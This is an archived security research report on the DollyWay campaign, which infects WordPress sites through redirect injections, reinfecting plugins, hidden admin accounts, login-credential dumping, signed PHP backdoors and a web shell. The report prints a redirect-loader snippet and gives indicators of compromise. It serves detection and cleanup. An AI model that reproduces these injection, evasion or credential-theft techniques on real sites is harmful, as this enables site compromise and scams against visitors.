{
	"id": "cc765b78-677e-4262-b3de-e440ea7fef33",
	"created_at": "2026-04-06T00:08:27.401466Z",
	"updated_at": "2026-04-10T03:24:18.226323Z",
	"deleted_at": null,
	"sha1_hash": "a3fde87f597cecbd40ba069b1bdf2876c13ead98",
	"title": "DollyWay World Domination: Eight Years of Evolving Website Malware Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10057215,
	"plain_text": "DollyWay World Domination: Eight Years of Evolving Website Malware\r\nCampaigns\r\nBy Denis Sinegubko\r\nPublished: 2025-03-17 · Archived: 2026-04-05 22:32:03 UTC\r\nKey findings \r\nGoDaddy Security researchers have uncovered a long-running malware operation dating back to 2016 that has\r\ncompromised over 20,000 websites globally in the past 8 years.   \r\nCampaign infrastructure currently leverages a distributed network of compromised WordPress sites as TDS and\r\nCommand and Control (C2) nodes. \r\nThe latest campaign (DollyWay) demonstrates sophisticated capabilities including cryptographically signed data\r\ntransfers, heterogeneous injection methods, and automatic reinfection mechanisms. \r\nThreat actors attempt to maintain control of compromised sites by removing any competing malware and updating\r\nWordPress.\r\nOverview \r\nGoDaddy Security researchers have uncovered evidence linking multiple malware campaigns into a single, long-running\r\noperation we've named \"DollyWay World Domination\". While previously thought to be separate campaigns, our research\r\nreveals these attacks share common infrastructure, code patterns, and monetization methods - all appearing to be connected\r\nto a single sophisticated threat actor. The operation was named after the following tell-tale string, which is found in some\r\nvariations of the malware: define('DOLLY_WAY', 'World Domination');.  \r\nThrough extensive analysis spanning eight years of data, we’ve connected seemingly disparate campaigns including\r\nMaster134, Fake Browser Updates, and CountsTDS into a comprehensive operational timeline. The current iteration, which\r\nwe track as DollyWay v3, primarily targets visitors of infected WordPress sites via injected redirect scripts that employ a\r\ndistributed network of Traffic Direction System (TDS ) nodes hosted on compromised websites. These scripts redirect site\r\nvisitors to various scam pages through traffic broker networks associated with VexTrio, one of the largest known\r\ncybercriminal affiliate networks that leverages sophisticated DNS techniques, traffic distribution systems, and domain\r\ngeneration algorithms to deliver malware and scams across global networks. While current monetization relies heavily on\r\nredirects, historical campaigns from this actor included more aggressive payloads like ransomware and banking trojans. \r\nThe operation comprises several distinct campaigns known by different names in the security community: \r\nMaster134 (2016-2020): First identified by CheckPoint researchers in 2018 \r\nFake Browser Updates (2018-2019) \r\nCountsTDS / DollyRAT / Backdoor.PHP.DOLLYWAY.A / Multistage WordPress Redirect Kit / R_Evil web shell\r\n(2020-present) \r\nThe latest variant of DollyWay malware demonstrates significant sophistication, employing multiple layers of obfuscation,\r\ncryptographic verification of malicious payloads, and reinfection mechanisms.  \r\nDollyWay: Massive scale and ongoing evolution \r\nThe DollyWay malware works exclusively on WordPress sites. Leveraging a distributed network of C2 and TDS nodes\r\nhosted on compromised sites, it redirects site visitors to VexTrio/LosPollos links. Historically, this operation has also used\r\nAdsTerra, PropellerAds and some other ad networks to monetize traffic from compromised sites. \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 1 of 19\n\nThis campaign is known for its sophisticated ways of infecting websites: \r\nCryptographically signed data transfers \r\nHeterogeneous injection spread across files and database \r\nAutomatic reinfection mechanisms \r\nRemoval of competing third-party malware \r\nWordPress updates and site repairs \r\nAs of February 2025, we have seen over 10,000 unique infected WordPress sites worldwide generating around 10 million\r\nimpressions of web pages with injected malicious scripts for millions of visitors with unique IP addresses every month. \r\nTechnical analysis of current campaign (DollyWay v3) \r\nIn this post, we will refer to the ongoing malicious campaign as DollyWay v3. Version 3 uses wp-content/counts.php\r\nscripts on select compromised sites as C2/TDS, while previous versions of DollyWay malware used different file names.  \r\nRedirect script injections \r\nDollyWay v3 employs a sophisticated four-stage injection chain designed to evade detection.  \r\nStage 1: Initial injection \r\nThe first stage leverages WordPress's wp_enqueue_script function to append a link to a dynamically generated script\r\nloading from the site's main URL whenever someone visits an infected domain. Each injection includes a unique 32-\r\ncharacter hexadecimal parameter — an MD5 hash that serves as a site identifier and is different for each infected site.  \r\nFrom now on, we’ll refer to the initial hexadecimal string as \u003chex32\u003e and its derivatives as md5(hex32), md5(md5(hex32))\r\nand so on, depending on how many times md5 function was applied. \r\nThe pattern for the Stage 1 injection is: \r\n\u003cscript src=\"https://\u003cinfected-site\u003e/?\u003cmd5(hex32)\u003e\u0026amp;ver=\u003cWordPress version\u003e\" id=\"\u003cmd5(hex32)\u003e-js\"\u003e\u003c/script\u003e\r\nExample with a redacted domain of an infected site: \r\n\u003cscript src=\"https://[redacted]/?ccb2d976143fb8616e62575fafebccbb\u0026amp;ver=6.6.1\" id=\"ccb2d976143fb8616e62575fa\r\nThe goal is to inject a generic looking script that will leave security scanners that only do static analysis of the HTML code\r\nwith very little information and hide the real malicious activity in the dynamically generated subsequent stages of the\r\ninjections. \r\nStage 2: Dynamic loading and referrer collection \r\nSince the URL in the Stage 1 script is not a static .js file, the WordPress engine is used to generate its contents. The\r\nDollyWay malware detects that the \u003cmd5(hexh32)\u003e parameter is present in the requested URL and hijacks the response\r\ngeneration, producing JavaScript code like this: \r\n(function() {\r\nvar ref;\r\nvar po = document.createElement('script');\r\npo.type = 'text/javascript';\r\npo.async = true;\r\nif(document.referrer.length == 0) {ref = 'undefined';} else {ref = document.referrer;}\r\n po.src = '?\u003cmd5(md5(hex32))\u003e\u0026' + Math.floor(Math.random() * 100000) + '\u0026' + ref;\r\nvar s = document.getElementsByTagName('script')[0];\r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 2 of 19\n\ns.parentNode.insertBefore(po, s);\r\n})();\r\nAt this point, the malware can still evade some static analysis tools that load links found in the HTML code of the page. So,\r\nthe goal of Stage 2 is to block static analysis scanners completely and start collecting information that may be used by a\r\nTDS while not revealing the malicious behavior. \r\nTo accomplish this, the Stage 2 script dynamically loads the Stage 3 script from the /?\u003cmd5(md5(hex32))\u003e URL on the\r\nsame site, passing the referrer as an additional parameter along with a random number probably added to divert attention. \r\n The URLs of the generated Stage 3 scripts look like this: \r\nhttps://[redacted]/?39c67aeb2992af8278ec16172137e422\u002677947\u0026https://www.google.com/\r\nStage 3: TDS script injection \r\nSince static analysis scanners can’t also easily discover the Stage 3 scripts, this is where the real malicious behavior begins.\r\nTo further evade detection, the malware performs some additional server-side filtering as shown below: \r\nThis means that the Stage 3 script will not be generated for:\r\nWordPress users that are currently logged in  \r\nKnown bots (the malware maintains its own list of around 102 different bot User-Agent strings) \r\nAny visitors that come from localhost  \r\nVisitors that don’t have a referrer (Stage 2 script set to “undefined”) \r\nFor those who don’t fall into the above criteria,  the malware generates a script that tries to dynamically load the Stage 4\r\nscripts from 3 random nodes (third-party infected sites). The malware stores a list of current nodes along with other malware\r\nsettings encoded as a WordPress option in the wp_options table. \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 3 of 19\n\nThese nodes act as TDS (traffic direction system) and use the /wp-content/counts.php path in their URLs to return scripts\r\nthat start the malicious redirect chain. Later, we will show how the nodes also act as C2 servers, providing the malware on\r\ninfected sites with the most up-to-date set of settings. \r\nTDS nodes and TDS script URLs \r\nThe TDS URLs contain two extra parameters ?cat and \u0026t. The \u003ccat\u003e is an integer number from 0 to 5 that specifies the\r\ndesired category of VexTrio scam links to be served to the visitor. The category is saved as “dolly_category” along with\r\nother DollyWay settings in the wp_options table. \r\n0 - Dating \r\n1 - Mainstream (Sweepstakes) \r\n2 - Crypto \r\n3 - Gay Dating \r\n4 - Gambling \r\n5 - Cams \r\nDollyWay v3 most frequently uses the Dating (0) and the Mainstream (1) categories. \r\nThe use of three different nodes at the same time can be explained by their desire to ensure the visitor gets redirected, even if\r\nsome of the nodes are taken down. Remember, the nodes are also compromised WordPress sites, and the attack operators\r\ndon’t fully control them and can’t guarantee their uptime. \r\nTo improve chances that some of the nodes are functional, DollyWay maintains a list of C2/TDS nodes that they store in the\r\nsettings and update them once a day. The list currently consists of 14 nodes and the Stage 3 script randomly picks three of\r\nthem every time it is triggered. \r\nStage 4: The redirect \r\nThe Stage 4 scripts returned by the TDS node is where the actual redirect code can be found.  \r\nAll the nodes typically return the exact same script. To avoid multiple redirects, the malware saves the “test” and the\r\n“click4” parameters (in Nov 2024, changed to “test01” and “click01” respectively) in the browser's local storage whenever a\r\nvisitor gets redirected to a scam site. \r\nThe redirect only occurs if these storage parameters are not found and when a visitor clicks anywhere on a web page. \r\nThe redirects consistently go to VexTrio/LosPollos links with the u=7mkpd0d parameter (affiliate user id in the LosPollos\r\nsystem). The \u0026o parameter changes depending on the category specified in the TDS URL For example, ex3wmkx\r\ncorresponds to the “Dating (0)” category and is specific to this LosPollos user only. \r\nEach category also has a predefined VexTrio domain name saved on each C2/TDS node. \r\nAfter Stage 4, VexTrio/LosPollos control the redirect chain. Usually, site visitors end up on their scam pages. Sometimes the\r\nfinal landing page will be a Google Play page for some legitimate application like Tinder, TikTok, Instagram, that probably\r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 4 of 19\n\nbuys downstream traffic from LosPollos or when their TDS decides that they are not interested in the visitor. \r\nExample of VexTrio/LosPollos scam landing page served by DollyWay redirects. \r\nServer-side analysis: Advanced persistence and stealth mechanisms \r\nNow that we know how this malware works from an external perspective, let's explore how everything works behind the\r\nscenes. \r\nPersistent reinfection mechanism \r\nThe malicious PHP code is injected into all active plugins and as WPCode snippets. \r\nWhat is more interesting is that injections don’t stop once the site is infected. This malware has a sophisticated reinfection\r\nprocedure that takes place every time any WordPress page is opened.  \r\nIt consists of 4 main steps: \r\n1. Disables security plugins from its (not very well maintained) built-in list: \r\nWordfence \r\nNinja Firewall \r\nMalCare \r\nwp-cerber (WordPress.org repository says: This plugin has been closed as of September 22, 2022 and is not\r\navailable for download. Reason: Security Issue.) \r\ngotmls/ Anti-Malware Security and Brute-Force Firewall \r\nAll-In-One Security (AIOS) \r\n2. Finds a DollyWay injection in one of the infected plugins or WPCode snippets and re-obfuscates it for every new\r\ninjection: \r\nRandomly renames variables and functions \r\nSplits string constants with random comments \r\n3. Re-injects freshly obfuscated DollyWay code into all active plugins that do not contain valid malware\r\nStrategically adds extra metadata comment at the top of the file, then injects the malicious code right after that\r\nprepending with 1000-2000 spaces so that it is not immediately visible. \r\n4. Reinfects WPCode snippets \r\nDeletes all WPCode snippets (even legitimate) \r\nInserts new re-obfuscated malicious snippets \r\nIn both the files and in WPCode snippets, the injected code looks like this: \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 5 of 19\n\nWith random variables, function names, and obfuscated string constants, the infection looks slightly different in every\r\ninfected file and DB record.\r\nThis procedure makes it hard to remove the malware as it constantly changes. Moreover, if the site has heavy traffic, the\r\nchances are it will be reinfected in the process of removing malware. If you fail to remove it from all the active plugins and\r\nWPCode snippets before someone loads any page, everything will get reinfected from a single piece of malware that can\r\nstill be found either in infected plugins or in the malicious WPCode snippets. \r\nSo, in the case of cleanup, the best course of action would be to temporarily take the site down (redirect all traffic to some\r\nstatic page) or, at least, disable all plugins.  (Note: The WPCode plugin will not be visible from the WordPress dashboard\r\nbecause DollyWay hides it.)\r\nWPCode snippets \r\nThe logic of malware reinfections suggests that they install this plugin on compromised sites and add malicious PHP\r\nsnippets with the execution scope “everywhere”. \r\nDuring the never-ending reinfections, they simply delete all WPCode snippets and create new ones with re-obfuscated code. \r\nIt’s not clear what the attackers do when they compromise a site that already uses this popular plugin (WPCode has over 2\r\nmillion active installations). You can imagine the damage if the site uses WPCode snippets for legitimate functionality. \r\nAs of October 2024, the injected WPCode snippets have specific dates associated with them that can be used as indicators of\r\ncompromise. \r\nIn wp_posts table: \r\npost_date: 2024-07-26 09:19:38 \r\npost_date_gmt: 2024-07-26 09:19:38 \r\npost_title: Untitled Snippet \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 6 of 19\n\npost_status: publish \r\npost_modified: 2024-07-26 09:25:37 \r\npost_modified_gmt: 2024-07-26 09:25:37 \r\npost_type: wpcode \r\nIn wp_options table (option_name: wpcode_snippets): \r\nmodified: 2024-08-05 10:55:28 \r\nlocation: everywhere \r\ncode_type: php \r\ntitle: Untitled Snippet \r\nWPCode's presence is pretty visible in the WordPress admin interface — and it is in the attackers’ best interest to keep it a\r\nsecret so that the site admins don’t suspect that something is not right. \r\nTo accomplish this, the malware removes all WPCode menus from the WordPress dashboard and removes the WPCode from\r\nthe list of installed plugins. The only way to notice the presence of this plugin and the malicious snippets is to examine the\r\nwp-content/insert-headers-and-footers/ directory and the plugin related records directly in the WordPress database. \r\nMalicious admin users \r\nThe WPCode plugin is not the only thing that malware tries to hide from site owners. It also removes the admin user created\r\nby the attackers from the list of existing WordPress users. \r\nSince 2020, this malware is associated with malicious WordPress admin users that have random hexadecimal up to 32\r\ncharacter long strings as user names using the same name for email address on a similarly random hexadecimal .com\r\ndomain. \r\nKey characteristics of malicious admin accounts: \r\nUsernames: Random hexadecimal strings (up to 32 characters) \r\nEmail pattern: \u003csame-as-username\u003e@[random-hex].com \r\nExample patterns: \r\nUsername: 7591c62c3c443a75fbdf9fadfbe2802f \r\nEmail: 7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8[.]com \r\nUsername: 36e21a1c8c \r\nEmail: 36e21a1c8c@d5b53904ee84dac8d41331f0b[.]com \r\nExamples of malicious usernames and email addresses (note, some of these credentials may also belong to previous iteration\r\nof the DollyWay campaign): \r\nUsername  Email \r\n7591c62c3c443a75fbdf9fadfbe2802f  7591c62c3c443a75fbdf9fadfbe2802f@113c971f77f8.com \r\n36e21a1c8c  36e21a1c8c@d5b53904ee84dac8d41331f0b.com \r\n6fcb1f44c9b1772a0  6fcb1f44c9b1772a0@1a8001dc2c3607.com \r\n3cc40c79f2d7217139a8  3cc40c79f2d7217139a8@27d831561ab46a5244a82.com \r\nStealing WordPress admin credentials \r\nAttackers realize that having their own admin user in the system is good but it is not guaranteed that they will always be able\r\nto use it. Eventually such users are getting discovered and deleted. Having credentials of real admin users may prove to be a\r\nbetter long term solution. \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 7 of 19\n\nThat’s why the malware monitors POST parameters from the login form and dumps them into a hidden (filename starts with\r\n.) downloadable file on the server.  \r\nDollyWay backdoors \r\nDollyWay v3 implements multiple sophisticated backdoor mechanisms with cryptographic verification to prevent\r\nunauthorized use of the malware. \r\nWhen a site GET request contains a predefined \u003chex32\u003e string, it creates a PHP file with the \u003chex32\u003e.php name and with\r\nthe contents extracted from the HTTP cookie with the same \u003chex32\u003e name. \r\nImplementation of another arbitrary PHP code execution function is more exotic. The malware monitors request URLs and,\r\nif it finds any where the part after the last slash is longer than 90 characters, it tries to extract and execute PHP from it.  \r\nThe PHP code is not passed in plain text though and the code execution is preceded by the following procedures on the part\r\nof the request after the last slash: \r\nThe string is sanitized to include only base64 characters. “$” is replaced by “+” and “*” is replaced by “/” \r\nThe string is broken down into three parts: \r\n1. The first 8 characters are the decode key \r\n2. The last 88 characters are cryptographic signature \r\n3. Everything in between is encrypted data \r\nThe integrity of data is verified by the cryptographic signature using the hardcoded public key and the\r\nopenssl_verify function. \r\nIf the integrity of data is verified, the data is decoded using a custom decoding XOR-based algorithm with additional\r\nlayers of gzip and base64 (lets call it DollyDecode). \r\nAnother check is performed once the data is decoded. It should contain the ‘host’ property whose value should match\r\nthe host of the infected website where this backdoor is being executed. \r\nIf everything holds, the PHP code from the “code” property of the decoded data is executed. \r\nThis sophisticated backdoor execution procedure has several goals: \r\nAllow sending malicious PHP commands in regular GET requests without using cookies \r\nPrevent unauthorized use of their backdoors by signing the executable code and specifying the domain for which it is\r\nintended: \r\n1. So that no one can use the backdoor to take over the site or remotely clean the infection, and; \r\n2. No one can execute properly signed backdoor code on a different host (e.g. if you’ve intercepted the backdoor\r\nrequest for one infected site). \r\nEarlier iterations of DollyWay v3 server-side malware \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 8 of 19\n\nBefore October 2024, DollyWay v3 used a slightly different approach to website infection. It was based on the codebase of\r\nDollyWay v2. \r\nIn 2022, bad actors installed a single “pseudo-legitimate” plugin that was responsible for injection of the redirect scripts into\r\nsite pages. We use the word “pseudo-legitimate” because these plugins are generated from code of legitimate plugins and\r\nthemes. They have the initial comment with the plugin metadata copied from random legitimate plugins. Their name may\r\nalso match the name of that legitimate plugin. The rest of the content doesn’t have anything to do with it though. It is\r\ncompiled from random functions from random files with sprinkles of malicious code that restores and executes the\r\nDollyWay PHP code from multiple WordPress options with seemingly benign names like organizerLoginUrl or wp_vers. \r\nThis approach made the detection of such plugins challenging since they look legitimate at the first glance, there were no\r\nobvious malware markers in the plugin files, the malicious code varied from file to file, and the real DollyWay code could\r\nonly be found encrypted in WordPress database. \r\nIn 2023, Dollyway shifted from using “pseudo-legitimate” plugins to outright fake “must use” plugins. They were placed in\r\nthe /wp-content/mu-plugins/ directory which doesn’t require plugin activation. \r\nThis particular variant didn’t pretend to be a legitimate plugin. Inside was only obfuscated code, without any plugin\r\nmetadata whatsoever.  \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 9 of 19\n\nThe fake plugins use random autogenerated names like: \r\nchordpress-excellent.php \r\ngig-muambator-howdy.php \r\nultimo-mapjam-insertr-lokalise.php \r\nWhen decoded, you can see the same approach with loading and executing the DollyWay PHP code directly from random\r\nWordPress options.   \r\nThe database part of this malware didn’t change much and you can immediately recognize it when you decode the\r\nWordPress option and see this line at the top: \r\nif(!defined('DOLLY_WAY')){ define('DOLLY_WAY', 'World Domination');}\r\nSide-effects of DollyWay malware \r\nSome iterations of DollyWay v3 malware involve file operations for every page load. If you monitor file creation and\r\ndeletion events, such activity may be used as an indicator of compromise.  \r\nThe names of the temporary files used by this malware may also look a bit off: \r\ntmp/base64_decode\u003crandom-string\u003e \r\ntmp/plugins\u003crandom-string\u003e \r\ntmp/sys_get_temp_dir\u003crandom-string\u003e \r\n… \r\nAdditional files and backdoors \r\nAnother backdoor can be found injected at the bottom of random legitimate files. It is usually prepended by hundreds of\r\nempty lines, so you may easily miss it when checking files manually. \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 10 of 19\n\nThe functionality of this backdoor is similar to the first type backdoor that is integrated into the DollyWay v3 malware. It\r\nexpects the \u003chex32\u003e REQUEST parameter and if it is found, creates a file on the server with the \u003chex32\u003e.php name and\r\nwith contents of the \u003chex32\u003e parameter. \r\nDollyWay maintenance and WordPress update scripts \r\nTwo PHP files are especially integral to the malware’s operation and tell-tale behavior.  \r\nWPU.php: WordPress update utility \r\nThe name of the malicious file, wpu.php, can probably be translated as WordPress Update. This script is likely used as some\r\nmaintenance / support utility both to repair broken sites, install prerequisites and start the malware injection process.  \r\n This maintenance script provides several key functions: \r\nWordPress core updates \r\nWPCode plugin installation and updates \r\nMalware installation via the cpl.php script  \r\nWe don’t know if all these functions are being used for every injection. What we do know is that we find this file on some\r\ncompromised sites alongside the DollyWay v3 malware and it belongs to the same campaign. \r\nThe wpu.php file updates the target website’s WordPress core files without using any WordPress functionality. The files are\r\nsimply fetched from the WordPress SVN repository https://core.svn.wordpress.org/tag/ and the appropriate WordPress\r\nversion is guessed based on the server's PHP version.  \r\nPHP 7.2.0 and newer: the malware chooses WordPress 6.6 \r\nPHP 7.0.x and 7.1.x: the malware chooses WordPress 6.5 \r\nPHP 7.0.0 and older: the malware chooses WordPress 5.1 \r\nThe current iteration of the malware always installs the WPCode version 2.2.1. The plugin files are also fetched directly\r\nfrom the SVN repository: \r\nhttps://plugins.svn.wordpress.org/insert-headers-and-footers/tags/2.2.1 \r\nThe script has two main work modes that try to accomplish updates in small batches: \r\n1. wpu.php?step=\u003cN\u003e WordPress update  \r\n2. wpu.php?ihaf=\u003cN\u003e WPCode update \r\nThe script is intended to work in the browser. You can tell this because it relies on JavaScript redirects to start the next\r\nstage/iteration of the update. \r\nOnce both types of updates are done, the script automatically redirects to the cpl.php script most likely to finalize the\r\nmalware installation. Interesting, that the cpl.php script has two modes of work based on presence of the fast_worker cookie:\r\n \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 11 of 19\n\nCpl.php: DollyWay web shell \r\nThe DollyWay v3 malware itself has a function to create cpl.php files, download their PHP code from an external URL,\r\nthen open that file in a browser. \r\nWe also find backdoors that drop cpl.php files. They are heavily encrypted and can be several hundred Kilobytes in size.\r\nWhen partially decrypted we see the use of the same DollyDecode algorithm as in the main malware. In this case, the\r\nmissing decoding parameter is retrieved from the cookie “nd_p”. If this parameter is present, the file also injects a\r\nJavaScript from //127.0.0.1/d_p.php from the attacker's own computer, which suggests interactive nature of the script. \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 12 of 19\n\nThe size of code and the fact that attackers want to load it in a browser suggests that this backdoor is some sort of web shell.\r\n \r\nThis hypothesis is backed by the analysis of the cpl.php file used in early iterations of this malware back in 2020, when it\r\nwas possible to easily decrypt it. Let’s just remember that cpl.php was a custom web shell. It has many generic web shell\r\nfunctions such as “file manager”, that can browse, edit, delete and create files, change their permissions, execute arbitrary\r\nPHP code. However, a significant share of its functionality is specific to this particular malware campaign. \r\nFor example, it could: \r\nInject the DollyWay malware into websites (back in 2020, they created a malicious version of the Hello Dolly plugin\r\n/hello/hello.php),  \r\nRemove DollyWay malware (all malicious WordPress options, all backdoors, maintenance and files) \r\nInstall, update, debug WordPress \r\nRemove malware from WordPress  \r\nYes, the attackers are so interested in every compromised website so that they can go a long way to make sure it works\r\nproperly and no other malware steals traffic from them or attracts unneeded site owner’s attention to security problems that\r\nmay result in removal of their malware along with other malware that caused the initial scrutiny. \r\nBack in 2020, malware operators already had over 150 complex signatures to detect and remove various types of malware,\r\nincluding signatures for massive third-party campaigns such as Balada Injector: \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 13 of 19\n\nWe can only speculate that with thousands of infected sites, the maintenance features of the cpl.php script have not been\r\nused for every site, otherwise it would require too much time or dozens of operators working around the clock. Most likely\r\nsuch features are only used for the most important sites (e.g. high traffic or TDS node) and for sites with obvious problems. \r\nMalware settings and configuration management \r\nThe malware maintains its configuration through encoded WordPress options, storing settings in a sophisticated but\r\ndiscoverable format. Each infected site maintains a unique identifier and configuration set. Settings are stored in the\r\nwp_option table in the option with the hex32 name (unique for each site) as base64-encoded serialized data: \r\na:4:{\r\ns:5:\"nodes\";a:14:{\r\ni:0;s:32:\"//\u003cnode1\u003e/wp-content/\";\r\ni:1;s:37:\"//\u003cnode2\u003e/wp-content/\";\r\ni:2;s:39:\"//\u003cnode3\u003e/wp-content/\";\r\ni:3;s:29:\"//\u003cnode4\u003e/wp-content/\";\r\ni:4;s:24:\"//\u003cnode5\u003e/wp-content/\";\r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 14 of 19\n\ni:5;s:46:\"//\u003cnode6\u003e/wp-content/\";\r\ni:6;s:45:\"//\u003cnode7\u003e/wordpress/wp-content/\";\r\ni:7;s:27:\"//\u003cnode8\u003e/wp-content/\";\r\ni:8;s:36:\"//\u003cnode9\u003e/wp-content/\";\r\ni:9;s:22:\"//\u003cnode10\u003e/wp-content/\";\r\ni:10;s:32:\"//\u003cnode11\u003e/wp-content/\";\r\ni:11;s:29:\"//\u003cnode12\u003e/wp-content/\";\r\ni:12;s:32:\"//\u003cnode13\u003e/wp-content/\";\r\ni:13;s:35:\"//\u003cnode1\u003e/wp-content/\";\r\n}\r\ns:15:\"dolly_last_cron\";i:0;\r\ns:14:\"dolly_category\";i:0;\r\ns:10:\"dolly_name\";s:32:\"\u003chex32\u003e\";\r\n}\r\nThe data consists of a list of (currently 14) nodes. The node URLs belong to infected third-party sites that serve as\r\nautonomous distributed C2/TDS. In the above example, we’ve replaced the domain names of the infected sites with\r\n\u003cnodeN\u003e. \r\nThe nodes are used to retrieve the most current list of nodes and inject redirect scripts to infected pages. \r\nOther settings include: \r\ndolly_last_cron - timestamp of the last time the nodes were updated (only used if WordPress cron service is\r\ndisabled) \r\ndolly_category - category of VexTrio links to use \r\ndolly_name - unique 32-character long hexadecimal string \u003chex32\u003e \r\nCommand \u0026 Control infrastructure \r\nDaily node list update \r\nThe node list is scheduled to be updated once a day using either WordPress cron jobs or directly through the malware when\r\nsomeone loads an infected web page. \r\nTo update the nodes, an infected site makes server-side requests to each of the current nodes until it receives a valid response\r\nfrom any of them. The node update request URLs look like http://\u003cnodeN\u003e/wp-content/data.txt. \r\n A typical response looks like this: \r\nWhere the first line is a cryptographic signature and the second line is a base64-encoded serialized data with new nodes and\r\ncategory codes. \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 15 of 19\n\nThe nodes array is saved into malware settings while “subs” are ignored by DollyWay v3. Subs is a legacy from DollyWay\r\nv2 that used to pass the “subs” values to the TDS URLs. \r\nWhile DollyWay v3 is the most current version of this malware, there are still many infected sites that use the older\r\nDollyWay v2 malware. And all the nodes work for both v2 and v3 malware, which explains why you can see data that is no\r\nlonger used still being passed in the update responses. \r\nCryptographic signatures verify data integrity \r\nThe update data is easy to decode, however the malware doesn’t immediately trust it. To apply the update, it should be\r\ncorrectly signed with a private key that only the malware operators have. Additionally, to ensure that the data wasn’t\r\ntampered with, the update function uses the public key and the openssl_verify function to verify the signature provided as\r\nthe first line of the update data. \r\nThis is a natural behavior when they run their C2 centers on compromised sites. This means that at any moment the malware\r\ncan be detected, removed, or modified. So, they need to guarantee the integrity of the data it tries to pass to infected sites. \r\nConclusion \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 16 of 19\n\nWhile this analysis provides insight into DollyWay’s current operations, it represents only the latest chapter in an eight-year\r\nevolution of increasingly sophisticated website compromise campaigns. The attention to detail, persistent infrastructure, and\r\nunusual focus on maintaining compromised sites points to a highly organized operation that has learned and adapted over\r\nnearly a decade.  \r\nIn our follow-up analysis, we’ll explore the C2/TDS nodes used by DollyWay malware along with how this campaign\r\nevolved from its earliest iterations as “Master134” in 2016 through multiple variants and infrastructure changes. We’ll\r\nexamine how the operators shift to and from ad network redirects, tech support scams and binary fake browser updates. Stay\r\ntuned as we unpack the complete timeline in our next deep-dive.  \r\nIndicators of compromise \r\nTDS node script URL pattern: \r\nhttps://\u003ccompromised-site\u003e/wp-content/counts.php?cat=[0|1]\u0026t=\u003cencrypted-ref-domain\u003e\r\nC2 update URL pattern: \r\nhttps://\u003ccompromised-site\u003e/wp-content/data.txt\r\nVexTrio/LosPollos integration: \r\nAffiliate ID before September 2021: u=h2xkd0x \r\nAffiliate ID after September 2021: u=7mkpd0d \r\nLosPollos API key: ea6ff61a45e946c287ea5f121c4f2e4b \r\nDomains and LosPollos categories: \r\nDating: romancezone[.]one \r\nMainstream: topawardpicks[.]top, yourspacegain[.]top \r\nCrypto: coinsboostbonus[.]top \r\nGay Dating: hot-gays-quest[.]life \r\niGaming: your-bigprofit.top \r\nCams: myhot-cams[.]life \r\nRedirects after November 20, 2024: \r\nPattern:  \r\nhxxps://\u003csubdomain\u003e.\u003capex-domain\u003e/help/?11341608982415\u0026sub_id_1=\u003cencripted-compromised-domain\u003e\r\nExample:  \r\nhxxps://dalopt.participates[.]cfd/help/?11341608982415\u0026sub_id_1=[redacted]\r\nRedirect domains: \r\nabstracts.cngsby[.]cfd \r\nity.anoneth[.]fun \r\nadmirable.brehmed[.]cfd \r\nadventure.lantial[.]cfd \r\nalignment.econd[.]cfd \r\nartistry.cngsby[.]sbs \r\nbarometer.unroose[.]space \r\nbreakfast.ffiftringg[.]sbs \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 17 of 19\n\ncomposure.pedancy[.]fun \r\nconfigure.crellar[.]cfd \r\nconstructive.curvive[.]space \r\nconstructive.lantial[.]us \r\ndalopt.participates[.]cfd \r\ndiscovered.secamondareeng[.]space \r\nexpedient.eithert[.]cfd \r\nframework.chellor[.]cfd \r\nframework.reorget[.]cfd \r\nframework.retiont[.]space \r\nlandscape.chanism[.]sbs \r\nlandscape.goalked[.]cfd \r\nlandslide.postume[.]cfd \r\nmainframe.crellar[.]sbs \r\nmethodical.reorgedt[.]fun \r\nmomentous.debayon[.]sbs \r\noverload.threath[.]sbs \r\nprocedure.secreeng[.]space \r\nresonance.agained[.]cfd \r\nstreaming.threath[.]cfd \r\ntavux.participates[.]cfd \r\ntransmit.chanism[.]cfd \r\ntremendous.mcgonal[.]cfd \r\nvintage.brehmed[.]sbs \r\nworkbench.cudwork[.]cfd \r\noldoak.spindexed[.]site\r\nkeenram.anariding[.]site\r\npremiumservices.approviding[.]store\r\nServer-side IoCs: \r\nFiles used in C2/TDS nodes: \r\nwp-content/counts.php \r\nwp-content/count.php \r\nwp-content/data.txt \r\nwp-content/4052e211471469076d33effdf1795b24 // md5('11341608982415') \r\nWPCode snippets: \r\nTable: wp_posts \r\n'wpcode' \r\npost_date='2024-07-26 09:19:38'\r\nTable: wp_options \r\noption_name=’wpcode_snippets’ \r\n$wpcode_option[‘everywhere’][0][‘modified’] = ‘2024-08-05 10:55:28’\r\nEncrypted DollyWay code in wp_options table (earlier modifications) \r\nCgppZighZGVmaW5lZCgnRE9MTFlfV0FZJykpeyBkZWZpbmUoJ0RPTExZX1dBWScsICdXb3JsZCBEb21pbmF0aW9uJyk7f\r\nStrings found in malware (active plugins and WPCode snippets): \r\nunserialize(base64_decode('YToxMDM6e2k6MDtzOjY6ImFocmVmcyI7aToxO3M6ODoiYXN0ZXJpYXMiO2k6MjtzOjE \r\nhttps://www.godaddy.com/resources/news/dollyway-world-domination\r\nPage 18 of 19\n\nunserialize(base64_decode('YToxMzp7czoxMToiUGx1Z2luIE5hbWUiO3M6MTE6IlBsdWdpbiBOYW1lIjtzO \r\nTemporary file names: 